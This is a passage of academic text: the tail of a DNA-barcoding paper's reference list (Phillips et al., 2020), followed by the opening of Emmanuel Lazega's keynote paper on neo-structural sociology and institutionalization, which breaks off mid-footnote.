DNA barcoding. Molecular Ecology Resources 13(6):969–975 DOI 10.1111/1755-0998.12046. Dasmahapatra KK, Elias M, Hill RI, Hoffman JI, Mallet J. 2010. Mitochondrial DNA barcoding detects some species that are real, and some that are not. Molecular Ecology Resources 10(2):264–273 DOI 10.1111/j.1755-0998.2009.02763.x. Eddelbuettel D, François R. 2011. Rcpp: seamless R and C++ integration. Journal of Statistical Software 40(8):1–18 DOI 10.18637/jss.v040.i08. Eddelbuettel D, Sanderson C. 2014. RcppArmadillo: accelerating R with high- performance C++ linear algebra. Computational Statistics and Data Analysis 71:1054–1063 DOI 10.1016/j.csda.2013.02.005. Edgar RC. 2010. Search and clustering orders of magnitude faster than BLAST. Bioinfor- matics 26(19):2460–2461 DOI 10.1093/bioinformatics/btq461. Efron B. 1979. Bootstrap methods: another look at the jackknife. The Annals of Statistics 7(1):1–26. Elbrecht V, Vamos EE, Steinke D, Leese F. 2018. Estimating intraspecific ge- netic diversity from community DNA metabarcoding data. PeerJ 6:e4644 DOI 10.7717/peerj.4644. Ewens WJ. 1972. The sampling theory of selectively neutral alleles. Theoretical Population Biology 3(1):87–112 DOI 10.1016/0040-5809(72)90035-4. Ezard T, Fujisawa T, Barraclough T. 2017. splits: SPecies’ limits by threshold statistics. R package version 1.0-19/r52. Available at https://R-Forge.R-project.org/projects/splits/ . Fujisawa T, Barraclough T. 2013. Delimiting species using single-locus data and the Generalized Mixed Yule Coalescent approach: a revised method and evaluation on simulated data sets. Systematic Biology 62(5):707–724 DOI 10.1093/sysbio/syt033. Goodall-Copestake W, Tarling G, Murphy E. 2012. On the comparison of population- level estimates of haplotype and nucleotide diversity: a case study using the gene cox1 in animals. Heredity 109(1):50–56 DOI 10.1038/hdy.2012.12. Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 33/37 https://peerj.com http://dx.doi.org/10.1111/j.1755-0998.2011.03108.x http://dx.doi.org/10.1146/annurev-marine-120308-080950 http://dx.doi.org/10.1080/10635150600960079 http://dx.doi.org/10.1111/1755-0998.12304 http://dx.doi.org/10.1126/sciadv.1400253 http://dx.doi.org/10.1111/1755-0998.12046 http://dx.doi.org/10.1111/j.1755-0998.2009.02763.x http://dx.doi.org/10.18637/jss.v040.i08 http://dx.doi.org/10.1016/j.csda.2013.02.005 http://dx.doi.org/10.1093/bioinformatics/btq461 http://dx.doi.org/10.7717/peerj.4644 http://dx.doi.org/10.1016/0040-5809(72)90035-4 https://R-Forge.R-project.org/projects/splits/ http://dx.doi.org/10.1093/sysbio/syt033 http://dx.doi.org/10.1038/hdy.2012.12 http://dx.doi.org/10.7717/peerj-cs.243 Gwiazdowski RA, Elkinton JS, Dewaard JR, Sremac M. 2013. Phylogeographic diversity of the winter moths Operophtera brumata and O. bruceata (Lepidoptera: Geometri- dae) in Europe and North America. Annals of the Entomological Society of America 106(2):143–151 DOI 10.1603/AN12033. Hanner R. 2009. Data standards for BARCODE records in INSDC (BRIs). University of Guelph. Hanner R, Floyd R, Bernard A, Collette BB, Shivji M. 2011. DNA barcoding of billfishes. Mitochondrial DNA 22(sup1):27–36 DOI 10.3109/19401736.2011.596833. Hanner RH, Naaum AM, Shivji MS. 2016. Conclusion: DNA-based authentication of shark products and implications for conservation and management. In: Naaum AM, Hanner RH, eds. Seafood authenticity and traceability: a DNA-based perspective. 1st edition. California, Massachusetts, Oxford: Academic Press. Harris DJ. 2003. Can you bank on GenBank Trends in Ecology & Evolution 18(7):317–319 DOI 10.1016/S0169-5347(03)00150-2. Hebert PD, Cywinska A, Ball SL, DeWaard J. 2003. Biological identifications through DNA barcodes. Proceedings of the Royal Society of London B: Biological Sciences 270(1512):313–321 DOI 10.1098/rspb.2002.2218. Hebert PD, Ratnasingham S, De Waard JR. 2003. Barcoding animal life: cytochrome c oxidase subunit 1 divergences among closely related species. Proceedings of the Royal Society of London B: Biological Sciences 270(Suppl 1):S96–S99. Hebert PD, Stoeckle MY, Zemlak TS, Francis CM. 2004. Identification of birds through DNA barcodes. PLOS Biology 2(10):e312 DOI 10.1371/journal.pbio.0020312. Hickerson MJ, Meyer CP, Moritz C. 2006. DNA barcoding will often fail to discover new animal species over broad parameter space. Systematic Biology 55(5):729–739 DOI 10.1080/10635150600969898. Hubert N, Hanner R, Holm E, Mandrak NE, Taylor E, Burridge M, Watkinson D, Dumont P, Curry A, Bentzen P, Zhang J, April J, Bernatchez L. 2008. Identifying Canadian freshwater fishes through DNA barcodes. PLOS ONE 3(6):e2490 DOI 10.1371/journal.pone.0002490. Jin Q, He L-J, Zhang A-B. 2012. A simple 2D non-parametric resampling statistical approach to assess confidence in species identification in DNA barcoding—an alternative to Likelihood and Bayesian approaches. PLOS ONE 7(12):e50831 DOI 10.1371/journal.pone.0050831. Kimura M, Weiss G. 1964. The stepping stone model of population structure and the decrease of genetic correlation with distance. Genetics 49(4):561–576. Kumar S, Stecher G, Tamura K. 2016. MEGA7: molecular evolutionary genetics analysis version 7.0 for bigger datasets. Molecular Biology and Evolution 33(7):1870–1874. Lavinia P, Kerr K, Tubaro P, Hebert P, Lijtmaer D. 2016. Calibrating the molecular clock beyond cytochrome b: assessing the evolutionary rate of COI in birds. Journal of Avian Biology 47(1):86–91 DOI 10.1111/jav.00766. Layton K, Martel A, Hebert P. 2014. Patterns of DNA barcode variation in Canadian marine molluscs. PLOS ONE 9(4):e95003 DOI 10.1371/journal.pone.0095003. Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 34/37 https://peerj.com http://dx.doi.org/10.1603/AN12033 http://dx.doi.org/10.3109/19401736.2011.596833 http://dx.doi.org/10.1016/S0169-5347(03)00150-2 http://dx.doi.org/10.1098/rspb.2002.2218 http://dx.doi.org/10.1371/journal.pbio.0020312 http://dx.doi.org/10.1080/10635150600969898 http://dx.doi.org/10.1371/journal.pone.0002490 http://dx.doi.org/10.1371/journal.pone.0050831 http://dx.doi.org/10.1111/jav.00766 http://dx.doi.org/10.1371/journal.pone.0095003 http://dx.doi.org/10.7717/peerj-cs.243 Liu J, Provan J, Gao L-M, Li D-Z. 2012. Sampling strategy and potential utility of indels for DNA barcoding of closely related plant species: a case study in Taxus. Interna- tional Journal of Molecular Sciences 13(7):8740–8751 DOI 10.3390/ijms13078740. Luo A, Lan H, Ling C, Zhang A-B, Shi L, Ho SY, Zhu C. 2015. A simulation study of sample size for DNA barcoding. Ecology and Evolution 5(24):5869–5879 DOI 10.1002/ece3.1846. Matz MV, Nielsen R. 2005. A likelihood ratio test for species membership based on DNA sequence data. Philosophical Transactions of the Royal Society of London B: Biological Sciences 360(1462):1969–1974 DOI 10.1098/rstb.2005.1728. Meyer CP, Paulay G. 2005. DNA barcoding: error rates based on comprehensive sampling. PLOS Biology 3(12):e422 DOI 10.1371/journal.pbio.0030422. Min X, Hickey D. 2007. Assessing the effect of varying sequence length on DNA barcod- ing of fungi. Molecular Ecology Notes 7:365–373 DOI 10.1111/j.1471-8286.2007.01698.x. Monaghan M, Wild R, Elliot M, Fujisawa T, Balke M, Inward D, Lees D, Ranaivosolo R, Eggleton P, Barraclough T, Vogler A. 2009. Accelerated species inventory on Madagascar using coalescent-based models of species delineation. Systematic Biology 58(3):298–311 DOI 10.1093/sysbio/syp027. Nielsen R, Matz M. 2006. Statistical approaches for DNA barcoding. Systematic Biology 55(1):162–169 DOI 10.1080/10635150500431239. Ondrejicka DA, Locke SA, Morey K, Borisenko AV, Hanner RH. 2014. Status and prospects of DNA barcoding in medically important parasites and vectors. Trends in Parasitology 30(12):582–591 DOI 10.1016/j.pt.2014.09.003. Ondrejicka DA, Morey K, Hanner RH. 2017. DNA barcodes identify medically impor- tant tick species in Canada. Genome 60(1):74–84 DOI 10.1139/gen-2015-0179. Overdyk LM, Braid HE, Crawford SS, Hanner RH. 2015. Extending DNA barcoding coverage for Lake Whitefish (Coregonus clupeaformis) across the three major basins of Lake Huron. DNA Barcodes 3(1):59–65. Paradis E. 2010. pegas: an R package for population genetics with an integrated— modular approach. Bioinformatics 26(3):419–420 DOI 10.1093/bioinformatics/btp696. Paradis E, Claude J, Strimmer K. 2004. APE: analyses of phylogenetics and evolution in R language. Bioinformatics 20(2):289–290 DOI 10.1093/bioinformatics/btg412. Pearson K. 1894. Contributions to the mathematical theory of evolution. Philosophical Transactions of the Royal Society of London. A 185:71–110 DOI 10.1098/rsta.1894.0003. Phillips JD, Gillis DJ, Hanner RH. 2019. Incomplete estimates of genetic diversity within species: Implications for DNA barcoding. Ecology and Evolution 9(5):2996–3010 DOI 10.1002/ece3.4757. Phillips JD, Gwiazdowski RA, Ashlock D, Hanner R. 2015. An exploration of sufficient sampling effort to describe intraspecific DNA barcode haplotype diversity: examples from the ray–finned fishes (Chordata: Actinopterygii). DNA Barcodes 3(1):66–73. Pons J, Barraclough T, Gomez-Zurita J, Cardoso A, Duran D, Hazell S, Kamoun S, Sumlin W, Vogler A. 2006. Sequence-based species delimitation for the Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 35/37 https://peerj.com http://dx.doi.org/10.3390/ijms13078740 http://dx.doi.org/10.1002/ece3.1846 http://dx.doi.org/10.1098/rstb.2005.1728 http://dx.doi.org/10.1371/journal.pbio.0030422 http://dx.doi.org/10.1111/j.1471-8286.2007.01698.x http://dx.doi.org/10.1093/sysbio/syp027 http://dx.doi.org/10.1080/10635150500431239 http://dx.doi.org/10.1016/j.pt.2014.09.003 http://dx.doi.org/10.1139/gen-2015-0179 http://dx.doi.org/10.1093/bioinformatics/btp696 http://dx.doi.org/10.1093/bioinformatics/btg412 http://dx.doi.org/10.1098/rsta.1894.0003 http://dx.doi.org/10.1002/ece3.4757 http://dx.doi.org/10.7717/peerj-cs.243 DNA taxonomy of undescribed insects. Systematic Biology 55(4):595–609 DOI 10.1080/10635150600852011. Puillandre N, Lambert A, Brouillet S. 2011. ABGD, automatic barcode gap discovery for primary species delimitation. Molecular Ecology 21:1864–1877. R Core Team. 2018. R: a language and environment for statistical computing. Vienna: R Foundation for Statistical Computing. Available at https://www.R-project.org/ . Ratnasingham S, Hebert PD. 2007. BOLD: the barcode of life data system (http://www.barcodinglife.org). Molecular Ecology Notes 7(3):355–364 DOI 10.1111/j.1471-8286.2007.01678.x. Ratnasingham S, Hebert PD. 2013. A DNA-based registry for all animal species: the Barcode Index Number (BIN) system. PLOS ONE 8(7):e66213 DOI 10.1371/journal.pone.0066213. Rognes T, Flouri T, Nichols B, Quince C, Mahé F. 2016. VSEARCH: a versatile open source tool for metagenomics. PeerJ 4:e2584 DOI 10.7717/peerj.2584. Ross HA, Murugan S, Li WLS. 2008. Testing the reliability of genetic methods of species identification via simulation. Systematic Biology 57(2):216–230 DOI 10.1080/10635150802032990. Ryan K, Crawford S. 2014. Distribution and abundance of larval lake whitefish (Core- gonus clupeaformis) in Stokes Bay, Lake Huron. Journal of Great Lakes Research 40:755–762 DOI 10.1016/j.jglr.2014.05.008. Spall JC. 2012. Stochastic optimization. In: Gentle JE, Härdle WK, Mori Y, eds. Hand- book of computational statistics: concepts and methods. 2nd edition. Heidelberg: Springer. Stein ED, Martinez MC, Stiles S, Miller PE, Zakharov EV. 2014. Is DNA barcoding actually cheaper and faster than traditional morphological methods: results from a survey of freshwater bioassessment efforts in the United States PLOS ONE 9(4):e95525 DOI 10.1371/journal.pone.0095525. Steinke D, Bernard AM, Horn RL, Hilton P, Hanner R, Shivji MS. 2017. DNA analysis of traded shark fins and mobulid gill plates reveals a high proportion of species of conservation concern. Scientific Reports 7(9505):1–6 DOI 10.1038/s41598-016-0028-x. Turon X, Antich A, Palacin C, Præbel K, Wangersteen O. 2019. From metabarcoding to metaphylogeography: separating the wheat from the chaff. bioRxiv. Ward RD, Zemlak TS, Innes BH, Last PR, Hebert PD. 2005. DNA barcoding Australia’s fish species. Philosophical Transactions of the Royal Society of London B: Biological Sciences 360(1462):1847–1857 DOI 10.1098/rstb.2005.1716. Wares JP, Pappalardo P. 2015. Can theory improve the scope of quantitative metazoan metabarcoding? Diversity 8(1):1–15 DOI 10.3390/d8010001. Watterson G. 1975. On the number of segregating sites in genetical models without recombination. Theoretical Population Biology 7(2):256–276 DOI 10.1016/0040-5809(75)90020-9. Wiemers M, Fiedler K. 2007. Does the DNA barcoding gap exist?—a case study in blue butterflies (Lepidoptera: Lycaenidae). Frontiers in Zoology 4(8):1–16. Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 36/37 https://peerj.com http://dx.doi.org/10.1080/10635150600852011 https://www.R-project.org/ http://dx.doi.org/10.1111/j.1471-8286.2007.01678.x http://dx.doi.org/10.1371/journal.pone.0066213 http://dx.doi.org/10.7717/peerj.2584 http://dx.doi.org/10.1080/10635150802032990 http://dx.doi.org/10.1016/j.jglr.2014.05.008 http://dx.doi.org/10.1371/journal.pone.0095525 http://dx.doi.org/10.1038/s41598-016-0028-x http://dx.doi.org/10.1098/rstb.2005.1716 http://dx.doi.org/10.3390/d8010001 http://dx.doi.org/10.1016/0040-5809(75)90020-9 http://dx.doi.org/10.7717/peerj-cs.243 Williams P, Byvaltsev A, Cederberg B, Berezin M, Ødegaard F, Rasmussen C, Richardson L, Huang J, Sheffield C, Williams S. 2015. Genes suggest ancestral colour polymorphisms are shared across morphologically cryptic species in arctic bumblebees. PLOS ONE 10(12):e0144544 DOI 10.1371/journal.pone.0144544. Wright S. 1951. The genetical structure of populations. Annals of Eugenics 15(1):323–354. Yao P-C, Gao H-Y, Wei Y-N, Zhang J-H, Chen X-Y, Li H-Q. 2017. Evaluating sampling strategy for DNA barcoding study of coastal and inland halo-tolerant Poaceae and Chenopodiaceae: a case study for increased sample size. PLOS ONE 12(9):e0185311 DOI 10.1371/journal.pone.0185311. Young R, Abott C, Therriault T, Adamowicz S. 2017. Barcode-based species delimitation in the marine realm: a test using Hexanauplia (Multicrustacea: Thecostraca and Copepoda). Genome 60(2):169–182 DOI 10.1139/gen-2015-0209. Zhang A-B, He L-J, Crozier RH, Muster C, Zhu C-D. 2010. Estimating sample sizes for DNA barcoding. Molecular Phylogenetics and Evolution 54(3):1035–1039 DOI 10.1016/j.ympev.2009.09.014. Zhang J, Kapli P, Pavlidis P, Stamatakis P. 2013. A general species delimitation method with applications to phylogenetic placements. Bioinformatics 29(22):2869–2876 DOI 10.1093/bioinformatics/btt499. Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 37/37 https://peerj.com http://dx.doi.org/10.1371/journal.pone.0144544 http://dx.doi.org/10.1371/journal.pone.0185311 http://dx.doi.org/10.1139/gen-2015-0209 http://dx.doi.org/10.1016/j.ympev.2009.09.014 http://dx.doi.org/10.1093/bioinformatics/btt499 http://dx.doi.org/10.7717/peerj-cs.243 work_lajupfoawjd2vjpjstci2opryq ---- Microsoft Word - Volume37_final insna.org | Issues 1&2 | Volume 37 | 7 Networks and Institutionalization: A Neo-structural Approach Emmanuel Lazega Institut d’Etudes Politiques de Paris, France Centre de Sociologie des Organisations – CNRS EUSN 2017 Mainz keynote address1 for Connections Revised 10 Dec 2017 Abstract This paper is the text prepared for the keynote address of the EUSN 2017 conference in Mainz, Germany. A short presentation of concepts reflects in part the foundations of neo- structural sociology (NSS) and its use of social and organisational network analyses, com- bined with other methodologies, to better understand the roles of structure and culture in indi- vidual and collective agency. The presentation shows how NSS accounts for institutional change by focusing on the importance of combined relational infrastructures and rhetorics. Specific characteristics of institutional entrepreneurs who punch above their weight in institu- tionalization processes are introduced for that purpose, particularly the importance of multi- status oligarchs, status heterogeneity, high-status inconsistencies, collegial oligarchies, con- flicts of interests and rhetorics of relative/false sacrifice. Two empirical examples illustrate this approach. The first case focuses on a network study of the Commercial Court of Paris, a 450-year-old judicial institution. The second case focuses on a network study of a field- configuring event (the so-called Venice Forum) lobbying for the emergence of a new Europe- an jurisdiction, the Unified Patent Court, and its attempt to create a common intellectual prop- erty regime for the continent. For sociologists, both examples involve “studying up”: they are cases of public/private joint regulation of markets bringing together these ingredients of insti- tutionalization. The conclusion suggests future lines of research that NSS opens for the study of institutionalization, in particular using the dynamics of multi-level networks. One of the main issues raised by this approach is its contribution to the study of democratic deficits in a period of intense institutional change in Europe. Author Emmanuel Lazega is Professor of sociology at the Institut d’Etudes Politiques de Paris and a membre of the Centre de Sociologie des Organisations (CNRS). His current research projects focus on the dynamics of multi-level networks in organizations and markets, with a special focus on network modelling of social processes helping actors in such settings manage the dilemmas of their collective action (contemporary forms of solidarity, social control, learning and regulation). He is the author and co-editor of several books (for example The Collegial Phenomenon, Oxford University Press; Micropolitics of Knowledge, Aldine-de Gruyter; Conventions and Structures in Economic Organization, edited with Olivier Favereau, Edward Elgar Publishing; Multilevel Network Analysis for the Social Sciences, edited with Tom A.B. Snijders, Springer; Knowledge and Networks, edited with Johannes Glückler and Ingmar Hammer). His publications can be downloaded from http://www.elazega.fr. 1 I would like to thank the committees of EUSN 2017, particularly Marina Hennig, for the invitation to present this keynote address. Connections Networks and Institutionalization 8 | Volume 37 | Issues 1&2 | insna.org Introduction The outline of this address is the following. It will first briefly present a few concepts that belong to the foundations of neo- structural sociology (NSS) (for a synthesis, see Lazega, 2006, 2012a). The purpose of this sociology is to use social and organi- zational network analyses, combined with other methodologies, to better understand the roles of structure and culture in the processes of collective agency. It will then look at how NSS contributes to under- standing institutional change as collective agency by focusing on the importance of relational infrastructures and rhetorics. It will next identify specific characteristics of institutional entrepreneurs who punch above their weight in institutionalization processes: the importance of high-status inconsistencies, collegial oligarchies, mul- ti-status oligarchs, conflicts of interests and rhetorics is hereby introduced. Two empir- ical examples will be provided to illustrate this approach. For the sociologist, both ex- amples involve ‘studying up’: they are cas- es of public/private joint regulation of markets looking at these elements of insti- tutionalization. The first case focuses on the Commercial Court of Paris, a 450-year- old judicial institution. The second case focuses on the emerging European Unified Patent Court. The conclusion suggests fu- ture lines of research that NSS opens up based on the study of institutionalization, in particular in the dynamics of multi-level networks. One of the main issues raised by this approach is that of democratic deficits in a period of intense institutional change in Europe. Foundations of neo-structural sociology Neo-structural sociology brings together, very generally, structure, culture and ac- tion (both individual and collective action) in the organizational society. It relies on sophisticated analyses of socio- organizational networks, if possible multi- level and dynamic, and enriched with data on culture and behavior2. The focus is on collective action, and especially on model- ling its generic social processes (learning and socialization, particularistic solidarity and discriminations, social control and conflict resolution, regulation and institu- tionalization). To theorize and model these processes, it is important to use the notion of relational infrastructures of collective action, particularly of collective action that relies on personalized ties between peers for coordination, elsewhere called collegi- ality3. In order to frame the issue theoreti- cally, relationships, as indicators of inter- dependencies, are defined as both channels for resources with, and symbolic or moral commitments to, exchange partners. It is because relationships have both dimen- sions that they can become infrastructural. Indeed, stabilized relationships are usually part of structures that are identified locally, in the entourage of the actors, as relational sub-structures with which we are all famil- iar, such as direct reciprocity, indirect reci- procity, transitivity, etc.; but also part of what can be called relational infrastruc- tures, such as vertical patterns of differen- tiations (mainly heterogeneous forms of status coexisting in complex ways) and horizontal patterns of differentiations (mainly social niches in a system of nich- es) at a morphological level. In particular, relational infrastructures combined with norms facilitate generic social processes helping members manage the dilemmas of their collective actions. Using combina- 2 Contemporary neo-structuralism is different from the structuralism of Claude Lévi- Strauss and of the 1960s mainly because it relies on a theory of individual and collective action to provide a new fundamental link between structure and process. The articulation between culture and structure, however, was already present in the ‘old’ structuralism. 3 This also means that understanding collec- tive action in ideal, typically speaking bu- reaucratized settings, based on routines, hie- rarchy and impersonal ties, does not need much social network analysis. Networks and Institutionalization Connections insna.org | Issues 1&2 | Volume 37 | 9 tions of relational infrastructures and rela- tional sub-structures in social and organi- zational networks, we have modelled sev- eral generic processes4, such as solidarities with direct and indirect reciprocity in vari- ous multiplex networks; social control in lateral control regimes using personal rela- tionships for collective goals; collective learning with various kinds of advice seek- ing networks; and regulation and institu- tionalization as political processes, that are the focus of this talk. Thus, NSS reframes the recursive dynamics of social structure and social processes. A focus on relational infrastructures in institutionalization processes Institutions are commonly and broadly de- fined as rules, norms, and beliefs that de- scribe reality for actors, explaining what is and is not, what can be acted upon and what cannot, and how (Hall & Taylor, 1996; Hoffman, 1999; Scott, 2007; Bathelt & Glückler, 2014). The focus is on the norms, mutual expectations and beliefs about issues and the legitimate organiza- tional ways in which related behavior has to be normed and governed. A classical question in the social sciences is: ‘How do such institutions emerge?’ Our work in this area owes much to collaboration, initiated by Harrison White in 1995, with institu- tional economists, in particular Olivier Fa- vereau (see Favereau and Lazega, 2002; Lazega 2016a). In the era of ‘governance’ (weakening of command and control framework of States) that we witnessed over the last decades, this neo-structural sociology has blossomed in economic so- ciology, by focusing on collective action in joint (public authorities and private actors, including business) regulation of markets. Since 1996, NSS has owed much to Julien 4 Neo-structural publications about these pro- cesses including theoretical, empirical and methodological work developing a neo- structural theory of institutionalization are available online: www.elazega.fr > http://elazega.fr/?m=201709 Brailly, Catherine Comet, Fabien Eloire, Guillaume Favre, Lise Mounier, Jaime Montes-Lihn, Mohamed Oubenal, Elise Penalva-Icher, Alvaro Pina-Stranger, Tom Snijders, Paola Tubaro, Marta Varanda, and many others. Contemporary thinking about the emergence of institutions is dominated in sociology by a variety of neo-institutional perspectives focusing on ‘institutional en- trepreneurs’ (DiMaggio, 1988) who elabo- rate on taken-for-granted cultural catego- ries, classifications, rules and procedures that include beliefs and codes stabilizing action into routines. In this literature, struc- tural dimensions of regulation are largely ignored. Yet in his work on what he calls ‘precarious values’, Selznick (1957) al- ready provides an early combination of a structural and an institutional perspective in sociology. A precarious value is one that is essential to the viability of the collectivi- ty but in which most members may have no direct stake. In this illustration of the entanglement of structure and culture, a value is therefore precarious because it is always in danger of losing its flag carriers and representatives, that is, the active sup- port by organized interest groups and elites that helps preserve it as a candidate for priority on the list of all competing values. We argue that, in organizational so- cieties (Perrow, 1991), where power is ex- tremely concentrated, this relational and cultural perspective enriches the study of institutionalization processes by focusing on their often collegial, elitist and person- alized nature. In this process, the selection of priority norms and the personalized se- lection of the authorities who champion them is an important process in the crea- tion of frames of reference that become taken for granted over time, and thus insti- tutionalized. Therefore, the creation of an oligarchy of actors, who are able to guide the regulatory process and to mobilize fol- lowers by helping them align with new rules, are key underlying mechanisms that belong to the institutionalization process as theorized by Selznick and encapsulated in his notion of precarious values. Connections Networks and Institutionalization 10 | Volume 37 | Issues 1&2 | insna.org Today the focus is on the process of regulation and institutionalization. There is something remarkable in the way relational infrastructures are mobilized in political, regulatory, institution building processes: their efficiency comes from the constitu- tion of collegial oligarchies whose mem- bers take advantage of situations of con- flicts of interests to concentrate power (Lazega, 2012b). High-status inconsistencies and conflicts of interests: Punching above their weight in institutionalization process We are not equal in our capacity to defend our regulatory interests, even in egalitarian systems. Very generally speaking, neo- structural sociology starts with the princi- ple that divergent interests and forced in- terdependencies complexify the regulatory process and development of institutions. It requires an understanding of interdepend- encies as relational infrastructures that are often conflictual, dynamic and multi-level. Modelling social processes in terms of networks adds much to the reflection on the way individual and collective agents defend their regulatory interests in institu- tionalization processes, and therefore to joint regulation as a social and political process. Selznick’s connection between structure and culture is still illuminating today with respect to understanding institu- tion building by small networks of top- level institutional entrepreneurs that we call collegial oligarchies. At a very high level of generality, defining norms for col- lective action, i.e. the political process in a collectivity, depends upon who are the ac- tors promoting these rules, what are their strategies to carry out this regulation with- in the system of their interdependencies, and what are the relational infrastructures that they are able to create and mobilize to do that. In this spirit, neo-structural sociol- ogy looks at institution building by explor- ing the relational dimension of ‘institution- al work’ (Lawrence, Suddaby and Leca, 2011) or political work (Lahille, 2015; Christopoulos and Ingold, 2015), i.e. at the system of interdependencies in collegial oligarchies of institutional entrepreneurs involved in institutional framing. In particular the neo-structural ap- proach to regulatory activity reveals the ways in which strategic agents politicise their exchanges, especially by building re- lational infrastructures, for example, social niches or forms of social status. Control- ling those relational infrastructures gives them a structural position that enables them to frame or guide the negotiation of rules, including building forms of consen- sus and normative alignments that are more or less long lasting. Observing the inconsistencies between these forms of sta- tus proves to be a powerful tool in the analysis of regulatory process5. The notion that different, heterogeneous dimensions of status could be socially inconsistent has a long history in sociology (Hughes, 1945; Lenski, 1954)6. It helps with substantiating the complex link between political work and position within the structure because political actors, as institutional entrepre- neurs, try to both accumulate power and increase their legitimacy. Indeed, in the po- litical process, it is not enough to simply assert that the strongest impose their own rules. Rather, neo-structural analyses show that it is often improbable agents occupy- ing heterogeneous and inconsistent dimen- sions of social statuses, i.e. in a position of ‘conflict of interest’, who have the greatest influence in the political work of institu- tional transformation, of defining Selz- nick’s ‘precarious values’ as priority rules. 5 These inconsistencies are also the reason for difficulties in properly specifying status in statistical network models (Lazega, Mou- nier, Snijders and Tubaro, 2012). 6 “Coexistence of a number of parallel verti- cal hierarchies which are usually imper- fectly correlated with each other. (…) Certain units may be consistently high or consistenly low, while others may com- bine high standing with respect to certain status variables with low status with respect to other variables” (Lenski, 1954:405). Networks and Institutionalization Connections insna.org | Issues 1&2 | Volume 37 | 11 Examples of how relational infrastructure, particularly complex and inconsistent forms of status, matter in institutionaliza- tion of norms in micro- or macro-political controversies (Lazega, 2001: chapter 8) abound. Analyses based on this approach show, for example, how financial indus- tries play a specific role of ‘discrete regu- lators’ (Huault & Richard, 2012). The study of regulation networks shared be- tween public bodies and private agents shows how proactive and how capable of guiding regulatory work the latter are. The financial sector is not the only powerful agent in terms of institutional work but its traditionally dual (economic and political) character gives it a specific role in many regulatory processes. This is precisely be- cause of its capacity to benefit from status heterogeneity, high-status inconsistencies and conflicts of interest. This allows it to become – in part – its own regulator, and to dominate and capture, for example, ju- dicial institutions. Structure, culture and broken promises: Combining high-status inconsistency with rhetorics of sacrifice Why are members with several, heteroge- neous, high and inconsistent forms of sta- tus – multi-status oligarchs – particularly efficient as institutional entrepreneurs when operating in collegial oligarchies and using conflicts of interests? Neo-structural sociology has long contributed to research in this area (compared, for example, with Owen-Smith & Powell, 2008; Glückler, Suddaby & Lenz, forthcoming) not only by framing institutionalization in these terms but by explaining the efficiency of high- status inconsistency. This efficiency relies on the agents’ ability to lose status on one dimension and use a rhetoric of sacrifice to ‘manage the losers’ of the institutionaliza- tion process (Lazega, 2001) – i.e. to man- age actors who stand to lose out from changes in the rules. These multi-status ol- igarchs are not just boundary spanners: they are improbable linchpins with high probability of being either sidelined or punching above their weight. They have to choose, for example, between broadening their constituency (with a view to the long- term stability of the institution) and estab- lishing oligarchic closure. Indeed, since actors organize their collective action around projects and rules, changing the rules is equivalent to break- ing promises made to these actors. Using a position of high-status inconsistency is ef- ficient in terms of institution building when actors are able to combine a form of power (control of resources that others need, i.e. finance, expertise, technique, time, law, etc.) with a form of legitimacy (discourse on behalf of the collective about the value of the new norms that is consid- ered credible and compatible with its over- all project). This credibility is increased when change of rules is presented as a cause of loss of status for the institutional entrepreneurs themselves. This loss of sta- tus is often presented as personal ‘sacri- fice’ of status for the common good. But this loss is very relative, if not false, when this ‘sacrifice’ jeopardizes one dimension of status without jeopardizing the other high and uncorrelated dimension of status. Combined with other factors, this justifica- tion of broken promises is thus more likely to obtain normative alignment from the losers of the process – those who had pre- viously organized themselves around the former rules – without forcing the entre- preneurs to lose all forms of status. Losing out on one dimension of status (while still keeping the other dimension) is thus equivalent to rhetorical creation/purchase of much needed legitimacy. Electoral poli- tics rely very often on this rhetoric of ‘loss’ of status that institutional entrepreneurs claim to accept for the general interest. Ex- amples of such ‘sacrifices’ are provided in the two illustrations below. Collegial oligarchy, weak culture and normative alignments The strength of these actors (their Weberi- an Herrschaft) is increased when they are able to join forces in what we call a colle- Connections Networks and Institutionalization 12 | Volume 37 | Issues 1&2 | insna.org gial oligarchy. Institutional entrepreneur- ship is strengthened in a regulatory college bringing together several persons with high-status inconsistency and conflicts of interests. This helps to draw a wide variety of constituencies into the process. Togeth- er, multi-status oligarchs become both ver- tical and horizontal linchpins in multiple, potentially conflicting domains and levels of regulation. Together they are able to ne- gotiate, select and stabilize not only the formulation of new norms, but also the conventions and interpretations of these priority norms (Favereau and Lazega, 2002). The main reason for which the creation of a collegial oligarchy is efficient in bringing together structure, culture and collective agency is that a group of hetero- geneous leaders, even fraught with initial disagreements, diverse constituencies, or antipathies, can evolve over time. Years, often decades, of common and discrete collaboration create proximities, personal- ized relationships and fragile structural equilibria where mutual critique decreases over time. Being in a collegial regime of personalized relationships reduces the ca- pacity to challenge others’ normative choices, to disagree. Members use their personalized relationships because they fa- cilitate discussion over time – even when these are not necessarily quiet relation- ships. The important feature of this colle- gial and oligarchic closure is that it ex- cludes stakeholders that would not agree with the regulatory solutions and compro- mises hammered out as ‘weak culture’ (Schultz and Breiger, 2010). This notion suggests that one can draw new and differ- ent actors (foreigners) into this process with the right choice of words. Oligarchic closure and cross-cutting networks have consequences for political participation: if you are not at the table, you are on the menu. Applications and developments in neo- structural economic sociology Regulation and institutionalization – ap- proached from the perspective of the strong political influence of ‘improbable’ multi-status oligarchs with high-status in- consistency and rhetorical skills – are among the processes that we have studied the most7 in neo-structural economic soci- ology. It has been productive to invest in this field of research because it was char- acterised by an era of ‘governance’. In this era, the command and control framework of states weakened and business was trying even harder than usual to take advantage of high-status inconsistency and conflicts of interests to build its own self-contained normative spaces where it could define the rules and the dual dimension of joint regu- lation of markets without politicians and citizens interfering with their institutional entrepreneurship. To illustrate this neo-structural ap- proach, let me present two cases of institu- tionalization of new norms in business- related judicial institutions (Lazega, 2003), one French and one European, looking at how relational infrastructures and high- status inconsistencies are mobilized in these institutionalization processes. These are studies of how business takes ad- vantage of high-status inconsistency, con- flicts of interests and the dual dimension of joint regulation of markets, most often with strong but discreet help from public authorities8. In these studies, the main in- stitutional entrepreneurs are judges who are not shy of exposing the political di- 7 We have tried to combine these elements in a cycle of conferences called Réseaux et ré- gulation that lasted 20 years (1996–2016) and that was set up and organized together with Lise Mounier. 8 It is not the place for a detailed description of face-to-face interviews (with sociometric 